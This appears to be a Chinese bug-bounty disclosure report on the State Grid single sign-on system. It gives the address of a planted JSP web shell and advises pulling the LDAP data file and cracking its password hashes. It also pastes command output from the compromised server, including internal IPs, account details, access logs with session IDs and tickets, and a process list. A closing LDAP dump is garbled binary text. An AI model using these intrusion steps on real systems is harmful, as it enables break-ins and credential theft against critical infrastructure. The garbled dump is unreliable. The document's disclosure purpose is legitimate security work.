2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
rt
sso 登录系统 使用 cas 基于ldap 下载ldap 数据文件 或用ladpexplorer ,解密 (ldap 一般 使用ssha 作为密码hash算法 ) ,这个系统是认证核心系统。已shell 可内网。网站http://iscsso.sgcc.com.cn
210.77.176.229:80 中国国家电力信息网http://iscsso.sgcc.com.cn/isc_sso/login?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2Fsgcis%2Fworkspace%2Fdefault.jspshell http://iscsso.sgcc.com.cn/isc_sso/jspspy.jspx PS F:\> ping iscsso.sgcc.com.cnPinging iscsso.sgcc.com.cn [210.77.176.229] with 32 bytes of data:++++++++++++++++++++++++++++++++++++++++++++lsautodeploybincas.logcas.log.1cas.log.2cas.log.3configconsole-extfileRealm.propertiesinit-infolibperfStats.logsecurityserversstartManagedWebLogic_readme.txtstartWebLogic.shtmpifconfigeth0 Link encap:Ethernet HWaddr 00:50:56:9A:0D:BE inet addr:10.3.22.13 Bcast:10.3.22.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:21030644 errors:0 dropped:0 overruns:0 frame:0 TX packets:19477545 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:5766569714 (5.3 GiB) TX bytes:13755777092 (12.8 GiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:23360 errors:0 dropped:0 overruns:0 frame:0 TX packets:23360 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1967649 (1.8 MiB) TX bytes:1967649 (1.8 MiB)uname -aLinux iscwwatt3 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linuxiduid=400(weblogic) gid=400(bea) groups=400(bea)/app/weblogic/Oracle/Middleware/user_projects/domains/sso_domainfind -name weblogic.xml./servers/sso3/stage/isc_sso/isc_sso/WEB-INF/weblogic.xml./servers/sso3/tmp/_WL_internal/bea_wls_cluster_internal/hoqa3m/war/WEB-INF/weblogic.xml./servers/sso3/tmp/_WL_internal/bea_wls9_async_response/paujim/war/WEB-INF/weblogic.xml./servers/sso3/tmp/_WL_internal/bea_wls_internal/d0811e/war/WEB-INF/weblogic.xmlhttp://iscsso.sgcc.com.cn/isc_sso/jspspy.jspx tail ./logs/access.log10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.130%3A8103%2Fsgcis HTTP/1.1" 200 1386610.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8104%2Fsgcis HTTP/1.1" 200 1386610.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8103%2Fsgcis HTTP/1.1" 200 1386610.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8101%2Fsgcis HTTP/1.1" 200 1386610.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "POST /isc_sso/login;jsessionid=ZGt9W22KTK9b5NKLwTXlGx7y5s3T3Cwx3S8T2k4cKnxQ791jhcSv!-2042157050?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2Fsgcis%2Fworkspace%2Fdefault.jsp HTTP/1.1" 302 42710.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.136%3A8104%2Fsgcis HTTP/1.1" 200 1386610.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.134%3A8104%2Fsgcis HTTP/1.1" 200 1386610.3.22.253 - - [20/Dec/2015:22:42:32 +0800] "POST /isc_sso/login;jsessionid=hpjXW22PQ7qMFG9nVtnz2Lh4BBpfHhQ29CTW2bGgXHppSjD1Yylg!-2042157050?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2F%2Fsgcis HTTP/1.1" 302 38510.3.22.253 - - [20/Dec/2015:22:42:33 +0800] "GET /isc_sso/serviceValidate?ticket=ST-32842-OthjrbdjjwgHcb7fgEac-cas01.example.org&service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2F%2Fsgcis&filter-name=ValidationFilter HTTP/1.1" 200 63910.3.22.253 - - [20/Dec/2015:22:42:34 +0800] "GET /isc_sso/f5HealthMonitor.jsp HTTP/1.1" 200 226root 292 0.0 0.0 0 0 ? S Nov19 0:00 [deferwq]root 325 0.0 0.0 0 0 ? S Nov19 0:00 [kdmremove]root 326 0.0 0.0 0 0 ? S Nov19 0:00 [kstriped]root 430 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_0]root 431 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_1]root 438 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_2]root 439 0.0 0.0 0 0 ? S Nov19 0:00 [vmw_pvscsi_wq_2]root 590 0.0 0.0 0 0 ? S Nov19 0:00 [kdmflush]root 592 0.0 0.0 0 0 ? S Nov19 0:00 [kdmflush]root 616 0.0 0.0 0 0 ? S Nov19 2:34 [jbd2/dm-1-8]root 617 0.0 0.0 0 0 ? S Nov19 0:00 [ext4-dio-unwrit]root 701 0.0 0.0 11084 1176 ? S<s Nov19 0:00 /sbin/udevd -droot 912 0.0 0.0 0 0 ? S Nov19 1:30 [vmmemctl]root 1383 0.0 0.0 11084 1208 ? S< Nov19 0:00 /sbin/udevd -droot 1384 0.0 0.0 11080 1196 ? S< Nov19 0:00 /sbin/udevd -droot 1427 0.0 0.0 0 0 ? S Nov19 0:00 [jbd2/sda1-8]root 1428 0.0 0.0 0 0 ? S Nov19 0:00 [ext4-dio-unwrit]root 1470 0.0 0.0 0 0 ? S Nov19 0:06 [kauditd]root 1630 0.0 0.0 0 0 ? S Nov19 1:14 [flush-253:1]root 1823 0.0 0.0 179320 4340 ? S Nov19 34:04 /usr/sbin/vmtoolsdroot 1913 0.0 0.0 93176 888 ? S<sl Nov19 0:18 auditdroot 1938 0.0 0.0 251396 3700 ? Sl Nov19 0:10 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5root 1967 0.0 0.0 10948 680 ? Ss Nov19 14:47 irqbalance --pid=/var/run/irqbalance.pidrpc 1985 0.0 0.0 18976 980 ? Ss Nov19 0:05 rpcbinddbus 2086 0.0 0.0 21796 1468 ? Ss Nov19 0:31 dbus-daemon --systemroot 2113 0.0 0.0 188900 3404 ? Ss Nov19 0:00 cupsd -C /etc/cups/cupsd.confroot 2141 0.0 0.0 4080 648 ? Ss Nov19 0:00 /usr/sbin/acpid68 2150 0.0 0.0 38988 3800 ? Ssl Nov19 0:46 haldroot 2151 0.0 0.0 20400 1164 ? S Nov19 0:00 hald-runnerroot 2192 0.0 0.0 22520 1084 ? S Nov19 0:00 hald-addon-input: Listening on /dev/input/event2 /dev/input/event068 2198 0.0 0.0 18008 1028 ? S Nov19 0:00 hald-addon-acpi: listeni
domain H誳rclguid 錦B8E0F08095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin 资ou=myrealm,dc=sso_domain vdc=sso_domain2 遫u @豰yrealm blobjectclass htop organizationalUnit H誳rclguid 氵B8E2290095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin " 1鬿u=groups,ou=myrealm,dc=sso_domain 资ou=myrealm,dc=sso_domain3 遫u :)groups blobjectclass organizationalUnit htop H誳rclguid ?B8E2772095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin 4 溢cn=Administrators,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain4 R蟤emberURL ?4絣dap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=Administrators,ou=groups,ou=myrealm,dc=sso_domain)) edescription U 杨Administrators can view and modify all resource attributes and start and stop servers blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n ?Administrators H誳rclguid ?B8E29E3095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin / cn=Deployers,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain5 R蟤emberURL ?鴅ldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=Deployers,ou=groups,ou=myrealm,dc=sso_domain)) edescription B 5瓺eployers can view all resource attributes and deploy applications blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n TDeployers H誳rclguid ?B8E2EC5095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin / cn=Operators,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain6 R蟤emberURL ?ldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=Operators,ou=groups,ou=myrealm,dc=sso_domain)) edescription R 縧Operators can view all resource attributes and perform server lifecycle operations blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n UOperators H誳rclguid ?B8E33A7095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin . 漑cn=Monitors,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain7 R蟤emberURL ?陸ldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=Monitors,ou=groups,ou=myrealm,dc=sso_domain)) edescription X 餱Monitors can view all resource attributes and perform operations not restricted by roles blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n L錗onitors H誳rclguid 阄B8E3618095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin 0 甁cn=AppTesters,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain8 R蟤emberURL ?vldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=AppTesters,ou=groups,ou=myrealm,dc=sso_domain)) edescription 7 ?AppTesters can test applications that are in admin mode blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n ^@AppTesters H誳rclguid 栀B8E3AFA095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin ; 癱n=CrossDomainConnectors,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain9 R蟤emberURL ?別ldap:///ou=groups,ou=myrealm,dc=sso_domain??sub?(&(objectclass=person)(wlsMemberOf=cn=CrossDomainConnectors,ou=groups,ou=myrealm,dc=sso_domain)) edescription 8 ?CrossDomainConnectors can communicate with other domains blobjectclass htop groupOfUniqueNames iroupOfURLs 抍n 罖CrossDomainConnectors H誳rclguid ?B8E3FDC095A511E5BF8915D356DCCFDF 垾createTimestamp R?01511050030Z l靋reatorsName Dn=Admin 7 闖cn=AdminChannelUsers,ou=groups,ou=myrealm,dc=sso_domain " 1鬿u=groups,ou=myrealm,dc=sso_domain10
危害等级:高
漏洞Rank:15
确认时间:2015-12-21 11:22
感谢提交
2015-12-31:感谢帮助,请联系厂商获取礼品。